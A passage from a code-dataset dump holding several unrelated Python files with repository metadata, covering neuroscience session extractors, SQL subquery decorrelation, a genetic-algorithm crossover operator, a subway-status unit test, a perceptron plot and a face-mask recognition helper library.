with open(custom_extractors) as fp:\n custom_task_types = json.load(fp)\n task_types.update(custom_task_types)\n except (ModuleNotFoundError, FileNotFoundError):\n pass\n return task_types\n\n\ndef get_task_protocol(session_path):\n try:\n settings = load_settings(get_session_path(session_path))\n except json.decoder.JSONDecodeError:\n _logger.error(f\"Can't read settings for {session_path}\")\n return\n if settings:\n return settings.get('PYBPOD_PROTOCOL', None)\n else:\n return\n\n\ndef get_task_extractor_type(task_name):\n \"\"\"\n Returns the task type string from the full pybpod task name:\n _iblrig_tasks_biasedChoiceWorld3.7.0 returns \"biased\"\n _iblrig_tasks_trainingChoiceWorld3.6.0 returns \"training'\n :param task_name:\n :return: one of ['biased', 'habituation', 'training', 'ephys', 'mock_ephys', 'sync_ephys']\n \"\"\"\n if isinstance(task_name, Path):\n task_name = get_task_protocol(task_name)\n if task_name is None:\n return\n task_types = _get_task_types_json_config()\n\n task_type = task_types.get(task_name, None)\n if task_type is None:\n task_type = next((task_types[tt] for tt in task_types if tt in task_name), None)\n if task_type is None:\n _logger.warning(f\"No extractor type found for {task_name}\")\n return task_type\n\n\ndef get_session_extractor_type(session_path):\n \"\"\"\n From a session path, loads the settings file, finds the task and checks if extractors exist\n task names examples:\n :param session_path:\n :return: bool\n \"\"\"\n settings = load_settings(session_path)\n if settings is None:\n _logger.error(f'ABORT: No data found in \"raw_behavior_data\" folder {session_path}')\n return False\n extractor_type = get_task_extractor_type(settings['PYBPOD_PROTOCOL'])\n if extractor_type:\n return extractor_type\n else:\n return False\n\n\ndef get_pipeline(session_path):\n \"\"\"\n Get the pre-processinf pipeline name from a session path\n :param session_path:\n :return:\n \"\"\"\n stype = get_session_extractor_type(session_path)\n return _get_pipeline_from_task_type(stype)\n\n\ndef _get_pipeline_from_task_type(stype):\n \"\"\"\n Returns the pipeline from the task type. Some tasks types directly define the pipeline\n :param stype: session_type or task extractor type\n :return:\n \"\"\"\n if stype in ['ephys_biased_opto', 'ephys', 'ephys_training', 'mock_ephys', 'sync_ephys']:\n return 'ephys'\n elif stype in ['habituation', 'training', 'biased', 'biased_opto']:\n return 'training'\n else:\n return stype\n", "repo_name": "int-brain-lab/load_trials_df_fix", "sub_path": "ibllib/io/extractors/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 8961, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "abc.ABC", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 33, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 37, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 63, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 65, "usage_type": "attribute"}, {"api_name": "ibllib.io.raw_data_loaders._logger.error", "line_number": 66, "usage_type": "call"}, {"api_name": "ibllib.io.raw_data_loaders._logger", "line_number": 66, "usage_type": "name"}, {"api_name": "ibllib.io.raw_data_loaders._logger.error", "line_number": 74, "usage_type": "call"}, {"api_name": "ibllib.io.raw_data_loaders._logger", "line_number": 74, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 91, "usage_type": "attribute"}, {"api_name": "ibllib.io.raw_data_loaders.load_data", "line_number": 122, "usage_type": "call"}, {"api_name": "ibllib.io.raw_data_loaders", "line_number": 122, "usage_type": "name"}, {"api_name": "ibllib.io.raw_data_loaders.load_settings", "line_number": 124, "usage_type": "call"}, {"api_name": "ibllib.io.raw_data_loaders", "line_number": 124, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 142, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 165, "usage_type": "call"}, {"api_name": "json.load", "line_number": 166, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 170, "usage_type": "call"}, {"api_name": "projects.base.base", "line_number": 170, "usage_type": "attribute"}, {"api_name": "projects.base", "line_number": 170, "usage_type": "name"}, {"api_name": "json.load", "line_number": 172, "usage_type": "call"}, {"api_name": "ibllib.io.raw_data_loaders.load_settings", "line_number": 181, "usage_type": "call"}, {"api_name": "one.alf.files.get_session_path", "line_number": 181, "usage_type": "call"}, {"api_name": "json.decoder", "line_number": 182, "usage_type": "attribute"}, {"api_name": "ibllib.io.raw_data_loaders._logger.error", "line_number": 183, "usage_type": "call"}, {"api_name": "ibllib.io.raw_data_loaders._logger", "line_number": 183, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 199, "usage_type": "argument"}, {"api_name": "ibllib.io.raw_data_loaders._logger.warning", "line_number": 209, "usage_type": "call"}, {"api_name": "ibllib.io.raw_data_loaders._logger", "line_number": 209, "usage_type": "name"}, {"api_name": "ibllib.io.raw_data_loaders.load_settings", "line_number": 220, "usage_type": "call"}, {"api_name": "ibllib.io.raw_data_loaders._logger.error", "line_number": 222, "usage_type": "call"}, {"api_name": "ibllib.io.raw_data_loaders._logger", "line_number": 222, "usage_type": "name"}]} +{"seq_id": "35147401437", "text": "import itertools\n\nfrom sqlglot import exp\nfrom sqlglot.optimizer.scope import traverse_scope\n\n\ndef decorrelate_subqueries(expression):\n \"\"\"\n Rewrite sqlglot AST to remove correlated subqueries.\n\n Subquery decorrelation can only happen if the predicate contains only equalitys and conjunctions.\n Additionally the subquery cannot have limits or offsets.\n\n Example:\n >>> import sqlglot\n >>> expression = sqlglot.parse_one(\"SELECT * FROM x AS x WHERE (SELECT y.a FROM y AS y WHERE x.a = y.a) = 1 \")\n >>> decorrelate_subqueries(expression).sql()\n 'SELECT * FROM x AS x JOIN (SELECT y.a FROM y AS y WHERE TRUE GROUP BY y.a) AS \"_d_0\" ON \"_d_0\".\"a\" = x.a AND (\"_d_0\".a) = 1 WHERE TRUE'\n\n Args:\n expression (sqlglot.Expression): expression to decorrelated\n Returns:\n sqlglot.Expression: qualified expression\n \"\"\"\n sequence = itertools.count()\n\n for scope in traverse_scope(expression):\n select = scope.expression\n where = select.args.get(\"where\")\n\n if not where or where.find(exp.Or) or select.find(exp.Limit, exp.Offset):\n continue\n\n for column in scope.external_columns:\n eq = column.find_ancestor(exp.EQ)\n\n if column.find_ancestor(exp.Where) != where or not eq:\n continue\n\n internal = eq.right if eq.left == column else eq.left\n value = select.selects[0]\n\n # if the join column is not in the select, we need to add it\n # but we can only do so if the original expression is an agg.\n # if the original subquery was (select foo from x where bar = y.bar)\n # adding bar would make the subquery result in more than 1 row...\n # (select foo, bar from x group by bar).\n # a possible optimization is to do a collect on foo and change operations to lists\n if internal not in [\n s.this if isinstance(s, exp.Alias) else s for s in scope.selects\n ]:\n if not value.find(exp.AggFunc):\n continue\n select.select(internal, copy=False)\n\n alias = f\"_d_{next(sequence)}\"\n on = exp.and_(f\"\\\"{alias}\\\".\\\"{internal.text('this')}\\\" = {column.sql()}\")\n\n predicate = select.find_ancestor(exp.Predicate, exp.Exists)\n\n eq.replace(exp.TRUE)\n select.replace(\n exp.Column(\n this=exp.to_identifier(value.alias_or_name),\n table=exp.to_identifier(alias),\n )\n )\n\n if predicate:\n predicate.replace(exp.TRUE)\n\n if isinstance(predicate, exp.Exists):\n select = select.select(internal, append=False)\n elif predicate:\n on = exp.and_(on, predicate)\n\n select = select.group_by(internal, copy=False)\n\n scope.parent.expression.join(\n select,\n on=on,\n join_alias=alias,\n copy=False,\n )\n\n return expression\n", "repo_name": "vdt/sqlglot", "sub_path": "sqlglot/optimizer/decorrelate_subqueries.py", "file_name": "decorrelate_subqueries.py", "file_ext": "py", "file_size_in_byte": 3083, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "itertools.count", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlglot.optimizer.scope.traverse_scope", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlglot.exp.Or", "line_number": 31, "usage_type": "attribute"}, {"api_name": "sqlglot.exp", "line_number": 31, "usage_type": "name"}, {"api_name": "sqlglot.exp.Limit", "line_number": 31, "usage_type": "attribute"}, {"api_name": "sqlglot.exp.Offset", "line_number": 31, "usage_type": "attribute"}, {"api_name": "sqlglot.exp.EQ", "line_number": 35, "usage_type": "attribute"}, {"api_name": "sqlglot.exp", "line_number": 35, "usage_type": "name"}, {"api_name": "sqlglot.exp.Where", "line_number": 37, "usage_type": "attribute"}, {"api_name": "sqlglot.exp", "line_number": 37, "usage_type": "name"}, {"api_name": "sqlglot.exp.Alias", "line_number": 50, "usage_type": "attribute"}, {"api_name": "sqlglot.exp", "line_number": 50, "usage_type": "name"}, {"api_name": "sqlglot.exp.AggFunc", "line_number": 52, "usage_type": "attribute"}, {"api_name": "sqlglot.exp", "line_number": 52, "usage_type": "name"}, {"api_name": "sqlglot.exp.and_", "line_number": 57, "usage_type": "call"}, {"api_name": "sqlglot.exp", "line_number": 57, "usage_type": "name"}, {"api_name": "sqlglot.exp.Predicate", "line_number": 59, "usage_type": "attribute"}, {"api_name": "sqlglot.exp", "line_number": 59, "usage_type": "name"}, {"api_name": "sqlglot.exp.Exists", "line_number": 59, "usage_type": "attribute"}, {"api_name": "sqlglot.exp.TRUE", "line_number": 61, "usage_type": "attribute"}, {"api_name": "sqlglot.exp", "line_number": 61, "usage_type": "name"}, {"api_name": "sqlglot.exp.Column", "line_number": 63, "usage_type": "call"}, {"api_name": "sqlglot.exp", "line_number": 63, "usage_type": "name"}, {"api_name": "sqlglot.exp.to_identifier", "line_number": 64, "usage_type": "call"}, {"api_name": "sqlglot.exp", "line_number": 64, "usage_type": "name"}, {"api_name": "sqlglot.exp.to_identifier", "line_number": 65, "usage_type": "call"}, {"api_name": "sqlglot.exp", "line_number": 65, "usage_type": "name"}, {"api_name": "sqlglot.exp.TRUE", "line_number": 70, "usage_type": "attribute"}, {"api_name": "sqlglot.exp", "line_number": 70, "usage_type": "name"}, {"api_name": "sqlglot.exp.Exists", "line_number": 72, "usage_type": "attribute"}, {"api_name": "sqlglot.exp", "line_number": 72, "usage_type": "name"}, {"api_name": "sqlglot.exp.and_", "line_number": 75, "usage_type": "call"}, {"api_name": "sqlglot.exp", "line_number": 75, "usage_type": "name"}]} +{"seq_id": "9354053990", "text": "import numpy as np\n\nfrom pymoo.model.crossover import Crossover\nfrom pymoo.operators.repair.out_of_bounds_repair import repair_out_of_bounds\n\n\nclass SimulatedBinaryCrossover(Crossover):\n def __init__(self, eta, n_offsprings=2, prob_per_variable=0.5, **kwargs):\n super().__init__(2, n_offsprings, **kwargs)\n self.eta = float(eta)\n self.prob_per_variable = prob_per_variable\n\n def _do(self, problem, X, **kwargs):\n\n X = X.astype(np.float)\n _, n_matings, n_var = X.shape\n\n # boundaries of the problem\n xl, xu = problem.xl, problem.xu\n\n #if np.any(X < xl) or np.any(X > xu):\n # raise Exception(\"Simulated binary crossover requires all variables to be in bounds!\")\n\n # crossover mask that will be used in the end\n do_crossover = np.full(X[0].shape, True)\n\n # per variable the probability is then 50%\n do_crossover[np.random.random((n_matings, problem.n_var)) > self.prob_per_variable] = False\n # also if values are too close no mating is done\n do_crossover[np.abs(X[0] - X[1]) <= 1.0e-14] = False\n\n # assign y1 the smaller and y2 the larger value\n y1 = np.min(X, axis=0)\n y2 = np.max(X, axis=0)\n\n # random values for each individual\n rand = np.random.random((n_matings, problem.n_var))\n\n def calc_betaq(beta):\n alpha = 2.0 - np.power(beta, -(self.eta + 1.0))\n\n mask, mask_not = (rand <= (1.0 / alpha)), (rand > (1.0 / alpha))\n\n betaq = np.zeros(mask.shape)\n betaq[mask] = np.power((rand * alpha), (1.0 / (self.eta + 1.0)))[mask]\n betaq[mask_not] = np.power((1.0 / (2.0 - rand * alpha)), (1.0 / (self.eta + 1.0)))[mask_not]\n\n return betaq\n\n # difference between all variables\n delta = (y2 - y1)\n\n # now just be sure not dividing by zero (these cases will be filtered later anyway)\n # delta[np.logical_or(delta < 1.0e-10, np.logical_not(do_crossover))] = 1.0e-10\n delta[delta < 1.0e-10] = 1.0e-10\n\n beta = 1.0 + (2.0 * (y1 - xl) / delta)\n betaq = calc_betaq(beta)\n c1 = 0.5 * ((y1 + y2) - betaq * delta)\n\n beta = 1.0 + (2.0 * (xu - y2) / delta)\n betaq = calc_betaq(beta)\n c2 = 0.5 * ((y1 + y2) + betaq * delta)\n\n # do randomly a swap of variables\n b = np.random.random((n_matings, problem.n_var)) <= 0.5\n val = np.copy(c1[b])\n c1[b] = c2[b]\n c2[b] = val\n\n # take the parents as _template\n c = np.copy(X)\n\n # copy the positions where the crossover was done\n c[0, do_crossover] = c1[do_crossover]\n c[1, do_crossover] = c2[do_crossover]\n\n c[0] = repair_out_of_bounds(problem, c[0])\n c[1] = repair_out_of_bounds(problem, c[1])\n\n if self.n_offsprings == 1:\n # Randomly select one offspring\n c = c[np.random.choice(2, X.shape[1]), np.arange(X.shape[1])]\n c = c.reshape((1, X.shape[1], X.shape[2]))\n\n return c\n", "repo_name": "AIasd/ADFuzz", "sub_path": "pymoo/pymoo/operators/crossover/simulated_binary_crossover.py", "file_name": "simulated_binary_crossover.py", "file_ext": "py", "file_size_in_byte": 3026, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 21, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pymoo.model.crossover.Crossover", "line_number": 7, "usage_type": "name"}, {"api_name": "numpy.float", "line_number": 15, "usage_type": "attribute"}, {"api_name": "numpy.full", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 28, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 37, "usage_type": "attribute"}, {"api_name": "numpy.power", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 66, "usage_type": "attribute"}, {"api_name": "numpy.copy", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 72, "usage_type": "call"}, {"api_name": "pymoo.operators.repair.out_of_bounds_repair.repair_out_of_bounds", "line_number": 78, "usage_type": "call"}, {"api_name": "pymoo.operators.repair.out_of_bounds_repair.repair_out_of_bounds", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 83, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "34202592698", "text": "import unittest\n\nfrom scripts.status_manager import parse_statuses_and_update_times, parse_statuses, \\\n get_new_delayed_trains_and_update_times\nfrom scripts.timer import Timer\n\n\nclass StatusManagerTest(unittest.TestCase):\n\n def test_shouldParseStatusesIntDict(self):\n status = \"\"\"Trains Rerouted\n D\n N\n Planned Work\n 2\n 5\n E\n SIR\n Weekday Service\n 1\n 3\n 4\"\"\"\n\n statuses_dict = {'Trains Rerouted': ['D', 'N'], 'Planned Work': ['2', '5', 'E', 'SIR'],\n 'Weekday Service': ['1', '3', '4']}\n\n parsed_statuses_dict = parse_statuses(status)\n\n self.assertDictEqual(statuses_dict, parsed_statuses_dict)\n\n def test_shouldReturnEmptyListGivenNoDelayedTrainsInTrainStatus(self):\n delayed_trains = set()\n train_delay_times = get_test_mta_line_delay_times_dict()\n\n statuses_dict = {'Trains Rerouted': ['D', 'N'], 'Planned Work': ['2', '5', 'E', 'SIR'],\n 'Weekday Service': ['1', '3', '4']}\n new_delayed_trains = get_new_delayed_trains_and_update_times(statuses_dict, delayed_trains, train_delay_times)\n\n self.assertTrue(not new_delayed_trains)\n\n def test_shouldReturnListOfDelayedTrainsGivenDelayedTrainsInTrainStatus(self):\n delayed_trains = set()\n train_delay_times = get_test_mta_line_delay_times_dict()\n\n statuses_dict = {'Trains Rerouted': ['D', 'N'], 'Planned Work': ['2', '5', 'E', 'SIR'],\n 'Delayed': ['A', 'B', 'C', 'F']}\n new_delayed_trains = get_new_delayed_trains_and_update_times(statuses_dict, delayed_trains, train_delay_times)\n\n self.assertEqual(new_delayed_trains, {'A', 'B', 'C', 'F'})\n\n def test_shouldPrintLineRecoveredWhenTrainWasDelayedButNowIsnt(self):\n delayed_trains = {'A', 'B', 'C', 'F'}\n train_delay_times = get_test_mta_line_delay_times_dict()\n train_delay_times['F'].start()\n\n statuses_dict = {'Trains Rerouted': ['D', 'N'], 'Planned Work': ['2', '5', 'E', 'SIR'],\n 'Delayed': ['A', 'B', 'C']}\n new_delayed_trains = get_new_delayed_trains_and_update_times(statuses_dict, delayed_trains, train_delay_times)\n\n self.assertEqual(new_delayed_trains, {'A', 'B', 'C'})\n\n\ndef get_test_mta_line_delay_times_dict():\n return {'R': Timer(),\n 'D': Timer(),\n 'E': Timer(),\n 'N': Timer(),\n 'SIR': Timer(),\n '1': Timer(),\n '2': Timer(),\n '3': Timer(),\n '4': Timer(),\n '5': Timer(),\n '6': Timer(),\n '7': Timer(),\n 'A': Timer(),\n 'B': Timer(),\n 'C': Timer(),\n 'F': Timer(),\n 'S': Timer(),\n 'G': Timer(),\n 'J': Timer(),\n 'L': Timer(),\n 'M': Timer(),\n 'Q': Timer(),\n 'W': Timer()\n }\n", "repo_name": "whelanworkmaster/mta_info_scraper", "sub_path": "tests/status_manager_test.py", "file_name": "status_manager_test.py", "file_ext": "py", "file_size_in_byte": 3139, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "unittest.TestCase", "line_number": 8, "usage_type": "attribute"}, {"api_name": "scripts.status_manager.parse_statuses", "line_number": 27, "usage_type": "call"}, {"api_name": "scripts.status_manager.get_new_delayed_trains_and_update_times", "line_number": 37, "usage_type": "call"}, {"api_name": "scripts.status_manager.get_new_delayed_trains_and_update_times", "line_number": 47, "usage_type": "call"}, {"api_name": "scripts.status_manager.get_new_delayed_trains_and_update_times", "line_number": 58, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 64, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 65, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 66, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 67, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 68, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 69, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 70, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 71, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 72, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 73, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 74, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 75, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 76, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 77, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 78, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 79, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 80, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 81, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 82, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 83, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 84, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 85, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 86, "usage_type": "call"}]} +{"seq_id": "23143050481", "text": "from Perceptron import *\nfrom Perceptron_applicability import *\nfrom Epochs import *\n\nfrom matplotlib.colors import ListedColormap\n\ndef plot_decision_regions(X, y, classifier, resolution=0.02):\n\n # setup marker generator and color map\n markers = ('s', 'x')\n colours = ('red', 'blue')\n cmap = ListedColormap(colours[:len(np.unique(y))])\n\n # plot the decision surface\n x1_min, x1_max = X[:, 0].min() - 1, X[:, 0].max() + 1\n x2_min, x2_max = X[:, 1].min() - 1, X[:, 1].max() + 1\n xx1, xx2 = np.meshgrid(np.arange(x1_min, x1_max, resolution),\n np.arange(x2_min, x2_max, resolution))\n Z = classifier.predict(np.array([xx1.ravel(), xx2.ravel()]).T)\n Z = Z.reshape(xx1.shape)\n plt.contourf(xx1, xx2, Z, alpha=0.3, cmap=cmap)\n plt.xlim(xx1.min(), xx1.max())\n plt.ylim(xx2.min(), xx2.max())\n\n # plot class samples\n for idx, cl in enumerate(np.unique(y)):\n plt.scatter(x=X[y == cl, 0], \n y=X[y == cl, 1],\n alpha=0.8, \n c=colours[idx],\n marker=markers[idx], \n label=cl, \n edgecolor='black')\n\n\n\n\nplot_decision_regions(X, y, classifier=ppn)\nplt.xlabel(\"area of kernel [mm*2]\")\nplt.ylabel(\"length of kernel groove [mm]\")\nplt.legend(loc=\"upper left\")\n\nplt.show()", "repo_name": "phillipbrooker/Researching_A_and_AI", "sub_path": "Plot_decision_regions.py", "file_name": "Plot_decision_regions.py", "file_ext": "py", "file_size_in_byte": 1339, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.colors.ListedColormap", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "74629052647", "text": "from config import (\n FONT_SCALE,\n GREEN_COLOR,\n BLACK_COLOR,\n LINE_THICKNESS,\n MATCH_SCALE,\n RESIZE_SIZE,\n TEXT_COORDINATES,\n TEXT_FONT,\n WHITE_COLOR,\n)\nfrom datetime import datetime\nfrom imutils import paths\nimport cv2\nimport json\nimport numpy\nimport os\nimport socket\nimport subprocess\n\n\ndef add_date_to_frame(frame: numpy.ndarray) -> None:\n \"\"\"\n Add Date in left top corner of frame\n\n Args:\n frame (numpy.ndarray): Frame captured by camera in Real-Time\n Return:\n None\n \"\"\"\n cv2.putText(\n frame,\n str(datetime.now().replace(microsecond=0)),\n TEXT_COORDINATES,\n TEXT_FONT,\n FONT_SCALE,\n GREEN_COLOR,\n LINE_THICKNESS,\n )\n\n\ndef add_match_to_frame(\n frame: numpy.ndarray,\n prediction_recognition: tuple,\n text_coordinates: str = (520, 360),\n) -> None:\n \"\"\"\n Add Match Found image in right bottom corner of frame\n\n Args:\n frame (numpy.ndarray): Frame captured by camera in Real-Time\n prediction_recognition (tuple): Decision about recognition made by SVM multi-class model\n text_coordinates (tuple): Text location coordinates\n Return:\n None\n \"\"\"\n unknown_path = \"static/assets/images/unknown.png\"\n is_unknown = prediction_recognition[1]\n image_path = (\n json_id_to_image_person(prediction_recognition[0])\n if is_unknown is False\n else unknown_path\n )\n match_image = cv2.imread(f\"{image_path}\")\n size = 100\n logo = cv2.resize(match_image, (size, size))\n added_image = cv2.addWeighted(\n frame[-size - 10 : -10, -size - 10 : -10, :], 0, logo[0:100, 0:100, :], 1, 0\n )\n frame_copy = numpy.copy(frame)\n frame_copy[-size - 10 : -10, -size - 10 : -10, :] = added_image\n cv2.putText(\n frame_copy,\n f\"Match found\",\n text_coordinates,\n TEXT_FONT,\n MATCH_SCALE,\n BLACK_COLOR,\n LINE_THICKNESS,\n )\n return frame_copy\n\n\ndef blur_and_resize_images_in_directory(path_directory: str):\n for image_path in paths.list_images(path_directory):\n image = cv2.imread(image_path)\n image_filtered = cv2.GaussianBlur(image, (3, 3), cv2.BORDER_DEFAULT)\n image_resized = cv2.resize(src=image_filtered, dsize=RESIZE_SIZE)\n cv2.imwrite(image_path, image_resized)\n print(image_path)\n\n\ndef header_face_mask(faces: tuple, frame: numpy.ndarray, prediction: int) -> None:\n \"\"\"\n Bounding box for Face-Mask Detection\n\n Args:\n Inherit from create_bounding_box()\n Return:\n None\n \"\"\"\n prediction_label = json_id_to_mask_label(prediction[0])\n cv2.rectangle(\n frame,\n (faces[0][0] - 1, faces[0][1] - 52),\n (faces[0][0] + faces[0][2] + 1, faces[0][1] - 20),\n WHITE_COLOR,\n -1,\n )\n cv2.putText(\n frame,\n f\"{prediction_label}\",\n (faces[0, 0], faces[0, 1] - 30),\n TEXT_FONT,\n FONT_SCALE,\n BLACK_COLOR,\n LINE_THICKNESS,\n )\n\n\ndef header_face_recognition(\n faces: tuple, frame: numpy.ndarray, prediction: int\n) -> None:\n \"\"\"\n Header for Face-Name Recognition\n\n Args:\n Inherit from create_bounding_box()\n Return:\n None\n \"\"\"\n is_unknown = prediction[1]\n prediction_label = json_id_to_recognition_label(prediction[0])\n cv2.rectangle(\n frame,\n (faces[0, 0] - 1, faces[0, 1] - 20),\n (faces[0, 0] + faces[0, 2] + 1, faces[0, 1] + 5),\n WHITE_COLOR,\n -1,\n )\n cv2.putText(\n frame,\n f'{\"Unknown\" if is_unknown else prediction_label}',\n (faces[0, 0], faces[0, 1]),\n TEXT_FONT,\n FONT_SCALE,\n BLACK_COLOR,\n LINE_THICKNESS,\n )\n return\n\n\ndef face_bounding_box(faces: tuple, frame: numpy.ndarray) -> None:\n \"\"\"\n Bounding box for face detection\n\n Args:\n Inherit from create_bounding_box()\n Return:\n None\n \"\"\"\n cv2.rectangle(\n frame,\n (faces[0, 0], faces[0, 1]),\n (faces[0, 0] + faces[0, 2], faces[0, 1] + faces[0, 3]),\n WHITE_COLOR,\n 2,\n )\n\n\ndef create_bounding_box(\n faces: tuple,\n frame: numpy.ndarray,\n mask_prediction: tuple,\n recognition_prediction: tuple,\n) -> None:\n \"\"\"\n Create bounding box for user interface\n\n Args:\n faces (tuple): Coordinates, width and height from faces detected by Haar Cascade Frontal Face\n frame (numpy.ndarray): Frame captured by camera in Real-Time\n mask_prediction (tuple): Prediction about wearing mask in integer\n recognition_prediction (tuple): Prediction about person in integer\n Return:\n None\n \"\"\"\n face_bounding_box(faces, frame)\n header_face_recognition(faces, frame, recognition_prediction)\n header_face_mask(faces, frame, mask_prediction)\n\n\ndef get_ip_address_raspberry() -> str:\n \"\"\"\n Get Raspberry IP address from LAN\n\n Args:\n None\n Return:\n Raspberry PI Local IP address (str)\n \"\"\"\n return subprocess.check_output([\"hostname\", \"-I\"]).decode(\"utf-8\").strip()\n\n\ndef get_ip_address_pc() -> str:\n \"\"\"\n Get PC IP address from LAN\n\n Args:\n None\n Return:\n PC Local IP address (str)\n \"\"\"\n return socket.gethostbyname(socket.gethostname())\n\n\ndef json_id_to_mask_label(id: int) -> str:\n \"\"\"\n Find the label for Face-Mask detection searching by id\n\n Args:\n id (int): Name to make the query in JSON file\n Return:\n Image path located in static folder\n \"\"\"\n with open(\"static/json/mask.json\") as json_file:\n items = json.load(json_file)\n\n item = next((item for item in items if item[\"id\"] == id), None)\n return str(item[\"label\"])\n\n\ndef json_id_to_recognition_label(id: int) -> str:\n \"\"\"\n Find the label for Face-Recognition searching by id\n\n Args:\n id (int): Name to make the query in JSON file\n Return:\n Image path located in static folder\n \"\"\"\n with open(\"static/json/people.json\") as json_file:\n items = json.load(json_file)\n\n item = next((item for item in items if item[\"id\"] == id), None)\n return str(item[\"name\"])\n\n\ndef json_id_to_image_person(id: int) -> str:\n \"\"\"\n Find the image path in json searching by person's name\n\n Args:\n name (str): Name to make the query in JSON file\n Return:\n Image path located in static folder\n \"\"\"\n with open(\"static/json/people.json\") as json_file:\n people = json.load(json_file)\n\n person = next((person for person in people if person[\"id\"] == id), None)\n return str(person[\"image\"])\n\n\ndef rename_images(path_images: str, prefix_name: str) -> None:\n \"\"\"\n Rename all files in a directory\n\n Args:\n path_images (str): Directory where images are located\n prefix_name (str): Prefix to add for all images in directory\n Return:\n None\n \"\"\"\n files = os.listdir(path_images)\n for index, file in enumerate(files):\n index_image = str(index)\n os.rename(\n os.path.join(path_images, file),\n os.path.join(path_images, f\"{prefix_name}_{index_image}.jpg\"),\n )\n\n\ndef show_face_mask_roi(frame: numpy.ndarray, coordinates: tuple) -> None:\n \"\"\"\n Show face mask ROI in face's bounding box\n\n Args:\n frame (str): Frame captured by camera\n coordinates (tuple): Face-Mask ROI coordinates\n Return:\n None\n \"\"\"\n cv2.rectangle(\n frame,\n (coordinates[0], coordinates[2]),\n (coordinates[1], coordinates[3]),\n GREEN_COLOR,\n LINE_THICKNESS,\n )\n", "repo_name": "fabriparadiso/face_mask_facial_recognition", "sub_path": "libraries/common.py", "file_name": "common.py", "file_ext": "py", "file_size_in_byte": 7597, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.ndarray", "line_number": 22, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 31, "usage_type": "call"}, {"api_name": "config.TEXT_COORDINATES", "line_number": 34, "usage_type": "argument"}, {"api_name": "config.TEXT_FONT", "line_number": 35, "usage_type": "argument"}, {"api_name": "config.FONT_SCALE", "line_number": 36, "usage_type": "argument"}, {"api_name": "config.GREEN_COLOR", "line_number": 37, "usage_type": "argument"}, {"api_name": "config.LINE_THICKNESS", "line_number": 38, "usage_type": "argument"}, {"api_name": "datetime.datetime.now", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 33, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 43, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 64, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 66, "usage_type": "call"}, {"api_name": "cv2.addWeighted", "line_number": 